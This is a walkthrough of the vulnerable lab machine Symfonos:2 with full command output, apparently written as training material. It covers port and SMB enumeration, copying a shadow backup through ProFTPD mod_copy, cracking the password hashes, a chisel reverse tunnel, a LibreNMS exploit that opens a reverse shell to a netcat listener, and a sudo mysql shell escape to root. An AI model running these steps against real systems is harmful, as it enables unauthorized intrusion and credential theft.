Recon
NMAP Complete Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
# Nmap 7.92 scan initiated Sun Jan 23 22:38:50 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/Symfonos-2/192.168.236.7/scans/_full_tcp_nmap.txt -oX /root/vulnHub/Symfonos-2/192.168.236.7/scans/xml/_full_tcp_nmap.xml 192.168.236.7
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.236.7
Host is up, received arp-response (0.00050s latency).
Scanned at 2022-01-23 22:38:51 +08 for 28s
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 ProFTPD 1.3.5
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/Cvyjh+QnQHsoZt3FqnW8JazNn1CYvc7uuArLkDPM25xV8l4Jc7Xw9InhmSFKJJD0mXhLALt/9byLeH7CyBEjpKATbSsEIL1iQ7G7ETmuOdZPfZxRnLhmaf1cvUxLapJQ5B3z67VR0PxvjfDk/0ARPAhKu1CuPmZk/y4t2iu8RKHG86j5jzR0KO3o2Aqsb2j+7XOd4IDCSFuoFiP3Eic/Jydtv73pyo+2JxBUvTSLaEtqe1op8sLP8wBFRX4Tvmqz/6zO1/zivBjBph8XMlzuMkMC8la8/XJmPb8U5C/8zfogG+YwycTw6ul7616PIj2ogPP89uyrTX9dM3RuZ9/1
| 256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKXypIGuum1SlMddq/BrUwIZM1sRIgbzdijCa1zYunAAT+uKTwPGaKO7e9RxYu97+ygLgpuRMthojpUlOgOVGOA=
| 256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILluhq57UWA4q/mo/h6CjqWMpMOYB9VjtvBrHc6JsEGk
80/tcp open http syn-ack ttl 64 WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:BB:18:ED (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/23%OT=21%CT=1%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=61E
OS:D6897%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=8
OS:)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B
OS:4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120
OS:)ECN(R=Y%DF=Y%TG=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=N)IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 0.002 days (since Sun Jan 23 22:37:09 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 9h59m59s, deviation: 3h27m50s, median: 7h59m59s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 57573/tcp): CLEAN (Couldn't connect)
| Check 2 (port 46951/tcp): CLEAN (Couldn't connect)
| Check 3 (port 30418/udp): CLEAN (Timeout)
| Check 4 (port 19386/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| SYMFONOS2<00> Flags: <unique><active>
| SYMFONOS2<03> Flags: <unique><active>
| SYMFONOS2<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-01-23T22:39:08
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos2
| NetBIOS computer name: SYMFONOS2\x00
| Domain name: \x00
| FQDN: symfonos2
|_ System time: 2022-01-23T16:39:08-06:00
TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms 192.168.236.7
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 23 22:39:19 2022 -- 1 IP address (1 host up) scanned in 29.66 seconds
TCP/21 (FTP)
NMAP Scan
1
2
3
4
5
6
7
8
9
┌──(root💀kali)-[~/vulnHub/Symfonos-2]
└─# nmap -vv --reason -Pn -T4 -sV -p 21 "--script=banner,(ftp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)"
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 ProFTPD 1.3.5
| banner: 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.16
|_8.236.7]
MAC Address: 08:00:27:BB:18:ED (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix
ProFTPD 1.3.5- Exploited before @ TryHackMe: Kenobi
- Anonymous access denied
TCP/80 (HTTP)
FFUF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root💀kali)-[~/vulnHub/Symfonos-2]
└─# ffuf -u http://192.168.236.7/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.sql,.php'
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.236.7/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .html .txt .sql .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
[Status: 200, Size: 183, Words: 18, Lines: 15]
index.html [Status: 200, Size: 183, Words: 18, Lines: 15]
:: Progress: [23075/23075] :: Job [1/1] :: 5603 req/sec :: Duration: [0:00:05] :: Errors: 0 ::
index.html
Nikto
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root💀kali)-[~/vulnHub/Symfonos-2]
└─# nikto -ask=no -h http://192.168.236.7:80 2>&1 | tee "/root/vulnHub/Symfonos-2/192.168.236.7/scans/tcp80/tcp_80_http_nikto.txt"
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.236.7
+ Target Hostname: 192.168.236.7
+ Target Port: 80
+ Start Time: 2022-01-23 23:50:07 (GMT8)
---------------------------------------------------------------------------
+ Server: webfs/1.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7916 requests: 1 error(s) and 3 item(s) reported on remote host
+ End Time: 2022-01-23 23:50:35 (GMT8) (28 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
webfs/1.21
TCP/139,445 (SMB)
Enum4linux
1
2
3
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\aeolus (Local User)
S-1-22-1-1001 Unix User\cronus (Local User)
aeoluscronus
Crackmapexec + SMBMap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root💀kali)-[~/vulnHub/Symfonos-2/192.168.236.7/exploit]
└─# crackmapexec smb $ip -u '' -p '' --shares
SMB 192.168.236.7 445 SYMFONOS2 [*] Windows 6.1 (name:SYMFONOS2)
SMB 192.168.236.7 445 SYMFONOS2 [+] \:
SMB 192.168.236.7 445 SYMFONOS2 [+] Enumerated shares
SMB 192.168.236.7 445 SYMFONOS2 Share Permissions
SMB 192.168.236.7 445 SYMFONOS2 ----- -----------
SMB 192.168.236.7 445 SYMFONOS2 print$
SMB 192.168.236.7 445 SYMFONOS2 anonymous READ
SMB 192.168.236.7 445 SYMFONOS2 IPC$ Service (Samba 4.5.16-Debian)
┌──(root💀kali)-[~/vulnHub/Symfonos-2/192.168.236.7/exploit]
└─# smbmap -H $ip
[+] Guest session IP: 192.168.236.7:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer
anonymous READ ONLY
IPC$ NO ACCESS IPC Service (Samba 4.5.16-Debian)
anonymous, READ ONLY
Initial Foothold
TCP/80 (HTTP) - No Exploits
- Proceed to
/index.html![]()
TCP/139,445 (SMB)
- Download all files recursively
1 2 3 4 5 6 7
┌──(root💀kali)-[~/vulnHub/Symfonos-2/192.168.236.7/loot/smb] └─# smbclient //$ip/anonymous -c 'prompt;recurse;mget *' Enter WORKGROUP\root's password: getting file \backups\log.txt of size 11394 as backups/log.txt (1112.7 KiloBytes/sec) (average 1112.7 KiloBytes/sec) ┌──(root💀kali)-[~/vulnHub/Symfonos-2/192.168.236.7/loot/smb] └─# ls backups
- View
backup/log.txt![]()
/var/backups/shadow.bak/home/aeolus/share
TCP/21 (FTP) - ProFTPD 1.3.5 File Copy
- Search exploits for
ProFTPD 1.3.51 2 3 4 5 6 7
----------------------------------------------------------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------- ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
RCErequires us to have access to a directory
- Use
ProFTPd 1.3.5 - File Copy![]()
- Exploit
- Copy
/var/backups/shadow.bakto/home/aeolus/share(anonymous share)1 2 3 4 5 6 7 8 9 10
┌──(root💀kali)-[~/vulnHub/Symfonos-2/192.168.236.7/exploit] └─# telnet $ip 21 Trying 192.168.236.7... Connected to 192.168.236.7. Escape character is '^]'. 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.236.7] site cpfr /var/backups/shadow.bak 350 File or directory exists, ready for destination name site cpto /home/aeolus/share/shadow.bak 250 Copy successful
![]()
- Download
shadow.bak1 2 3 4 5 6 7
┌──(root💀kali)-[~/vulnHub/Symfonos-2/192.168.236.7/loot/smb] └─# smbclient //$ip/anonymous Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> get shadow.bak getting file \shadow.bak of size 1173 as shadow.bak (572.7 KiloBytes/sec) (average 572.8 KiloBytes/sec) smb: \>
- Copy
- Extract hashes
1 2 3 4 5
┌──(root💀kali)-[~/vulnHub/Symfonos-2/192.168.236.7/loot/smb] └─# cat shadow.bak | cut -d ":" -f2 | sed 's/*\|!/ /g' | awk 'NF' $6$VTftENaZ$ggY84BSFETwhissv0N6mt2VaQN9k6/HzwwmTtVkDtTbCbqofFO8MVW.IcOKIzuI07m36uy9.565qelr/beHer. $6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG. $6$wOmUfiZO$WajhRWpZyuHbjAbtPDQnR3oVQeEKtZtYYElWomv9xZLOhz7ALkHUT2Wp6cFFg1uLCq49SYel5goXroJ0SxU3D/
sha512crypt (1800)
- Crack hashes
1 2 3 4 5 6 7
┌──(root💀kali)-[~/vulnHub/Symfonos-2/192.168.236.7/loot/smb] └─# hashcat -a 0 -m 1800 hashes /usr/share/wordlists/rockyou.txt --show $6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:sergioteamo ┌──(root💀kali)-[~/vulnHub/Symfonos-2/192.168.236.7/loot/smb] └─# cat shadow.bak | grep -i mlg aeolus:$6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:18095:0:99999:7:::
- aeolus:sergioteamo
TCP/22 (SSH)
- SSH w/ aeolus:sergioteamo
![]()
Privilege Escalation
Cronus - Via LibreNMS CMS Authenticated RCE
- Ran linpeas
![]()
127.0.0.1:8080apache2running ascronus
- Open up the internal service w/ Chisel
- Kali
1 2 3 4 5 6 7
┌──(root💀kali)-[~/vulnHub/Symfonos-2/192.168.236.7/loot/smb] └─# chisel server --reverse --port 1337 2022/01/24 00:59:48 server: Reverse tunnelling enabled 2022/01/24 00:59:48 server: Fingerprint zUwTnSwJD7AhStYF+Mrpe5iyr4aIGUEHlvhXnP7dGhk= 2022/01/24 00:59:48 server: Listening on http://0.0.0.0:1337 2022/01/24 01:00:31 server: session#1: Client version (1.7.6) differs from server version (0.0.0-src) 2022/01/24 01:00:31 server: session#1: tun: proxy#R:8888=>8080: Listening
- Target
1 2 3 4 5
aeolus@symfonos2:~$ ./chiselLinux64 client 192.168.236.4:1337 R:8888:127.0.0.1:8080 & [1] 2242 aeolus@symfonos2:~$ 2022/01/23 19:00:31 client: Connecting to ws://192.168.236.4:1337 2022/01/23 19:00:31 client: Connected (Latency 1.756904ms)
- Kali
- Proceed to
localhost:8888, login w/ aeolus:sergioteamo![]()
- Search exploits for
LibreNMS- https://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/
php/webapps/47044.py- https://www.exploit-db.com/exploits/47044
- Obtain Cookies
1
"XSRF-Token=; librenms_session=; PHPSESSID="
![]()
- Exploit
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
[!] Usage : ./exploit.py http://www.example.com cookies rhost rport ┌──(root💀kali)-[~/vulnHub/Symfonos-2/192.168.236.7/exploit] └─# python 47044.py http://localhost:8888 "XSRF-Token=eyJpdiI6InVYMkhsU3FqQ09NZ2xCeFd4N3RuTEE9PSIsInZhbHVlIjoiS2pmejIzc3lBOVhWallPZlpYQ1J6MzI5YUptQ1pQWFpaWndCdUZDOUV1R0h6bVoyaGZsZnh3RmFVNlZcL25rZ1hYaVQwY01obkg0YUtPTG9MKzRqZVN3PT0iLCJtYWMiOiI0NzVmYmFjNjBhZjI4NDM5YWNiMzY3MTA4ZjE1YzhlNWQxMzY0ODcyMWIwNDkxNmFmZmZiZjg0ODM1MzJlMTA4In0%3D; librenms_session=eyJpdiI6IjV4N1RUR1wveVBBUjliNlRnQWsxdElBPT0iLCJ2YWx1ZSI6ImNWRkN3VnBEbG16eE92bTU1aVBoVEFhQnBnMm5QamEyWWJ3YVV3MzZIY0VOMGxJR3BGN0tVMno0SVVkMmJQaGxPalJNaHJXQU5PK2dhQ0Z4RkxabEJRPT0iLCJtYWMiOiIwOGE1NDQ1MTY3YjJlMGVmZTg5NzZkYWNjYzE1OGZmYmRjMTRlZDU4YTE2MmU5NTNlMjljM2I2MzNjN2RiM2E0In0%3D; PHPSESSID=9e807k9im9sjtqtp5408c58qj4" 192.168.236.4 4444 [+] Device Created Sucssfully ┌──(root💀kali)-[~/vulnHub/Symfonos-2] └─# nc -nvlp 4444 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 192.168.236.7. Ncat: Connection from 192.168.236.7:46838. /bin/sh: 0: can't access tty; job control turned off $ whoami; id cronus uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
![]()
Root - Via Sudo GTFO Bin
- Check sudo access
1 2 3 4 5 6 7
cronus@symfonos2:/opt/librenms/html$ sudo -l Matching Defaults entries for cronus on symfonos2: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User cronus may run the following commands on symfonos2: (root) NOPASSWD: /usr/bin/mysql cronus@symfonos2:/opt/librenms/html$ - Exploit
1
sudo /usr/bin/mysql -e '\! /bin/sh'
- Root shell obtained
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35
cronus@symfonos2:/opt/librenms/html$ sudo /usr/bin/mysql -e '\! /bin/sh' # whoami root # cd /root # ls proof.txt # cat proof.txt Congrats on rooting symfonos:2! , , ,-`{-`/ ,-~ , \ {-~~-, ,~ , ,`,-~~-,`, ,` , { { } } }/ ; ,--/`\ \ / / }/ /,/ ; ,-./ \ \ { { ( /,; ,/ ,/ ; / ` } } `, `-`-.___ / `, ,/ `,/ \| ,`,` `~.___,---} / ,`,,/ ,`,; ` { { __ / ,`/ ,`,; / \ \ _,`, `{ `,{ `,`;` { } } /~\ .-:::-. (--, ;\ `,} `,`; \\._./ / /` , \ ,:::::::::, `~; \},/ `,`; ,-=- `-..-` /. ` .\_ ;:::::::::::; __,{ `/ `,`; { / , ~ . ^ `~`\:::::::::::<<~>-,,`, `-, ``,_ } /~~ . ` . ~ , .`~~\:::::::; _-~ ;__, `,-` /`\ /~, . ~ , ' ` , .` \::::;` <<<~``` ``-,,__ ; /` .`\ /` . ^ , ~ , . ` . ~\~ \\, `,__ / ` , ,`\. ` ~ , ^ , ` ~ . . ``~~~`, `-`--, \ / , ~ . ~ \ , ` . ^ ` , . ^ . , ` .`-,___,---,__ `` /` ` . ~ . ` `\ ` ~ , . , ` , . ~ ^ , . ~ , .`~---,___ /` . ` , . ~ , \ ` ~ , . ^ , ~ . ` , ~ . ^ , ~ . `-, Contact me via Twitter @zayotic to give feedback!![]()
Comments powered by Disqus.